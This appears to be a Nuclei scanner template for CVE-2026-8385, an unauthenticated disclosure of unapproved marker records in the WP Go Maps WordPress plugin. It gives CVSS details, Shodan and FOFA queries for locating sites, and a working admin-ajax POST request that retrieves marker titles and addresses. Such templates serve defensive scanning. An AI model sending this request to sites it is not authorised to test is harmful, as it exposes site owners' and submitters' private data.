id: CVE-2026-8385 info: name: WordPress WP Go Maps < 10.0.10 - Unauthenticated Marker Data Disclosure author: 0x_Akoko severity: medium description: | WP Go Maps WordPress plugin < 10.0.10 contains an information disclosure vulnerability caused by improper enforcement of marker approval filter in admin-ajax fallback for datatables route, letting unauthenticated visitors retrieve unapproved marker records. impact: | Unauthenticated attackers can access unapproved marker data including title, category, address, and description, leading to sensitive information disclosure. remediation: | Update to version 10.0.10 or later. reference: - https://wpscan.com/vulnerability/984cad38-6d01-4956-8bf1-29585258780b/ - https://nvd.nist.gov/vuln/detail/CVE-2026-8385 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2026-8385 epss-score: 0.00762 epss-percentile: 0.51589 cwe-id: CWE-200 metadata: verified: true max-request: 2 vendor: developer-developer product: wp-google-maps framework: wordpress shodan-query: http.html:"wp-google-maps" fofa-query: body="wp-google-maps" tags: cve,cve2026,wordpress,wp-plugin,wp,wp-google-maps,exposure flow: http(1) && http(2) http: - raw: - | GET /wp-content/plugins/wp-google-maps/readme.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "WP Google Maps")' condition: and internal: true - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=wpgmza_rest_api_request&route=%2Fdatatables%2F&phpClass=WPGMZA%5CMarkerDataTable&map_id=1&length=10&start=0&draw=1 matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains_all(body, "recordsTotal", "recordsFiltered", "address")' condition: and # digest: 4a0a004730450220050253576d40b3379a4e870b482a97904efaaffbfced9f08aa515695d20965a4022100dd9a5c5ce977c023c7d8f93fd8309fdb5e294ea7461da0967a4e597a0bc45ef4:922c64590222798bb761d5b6d8e72950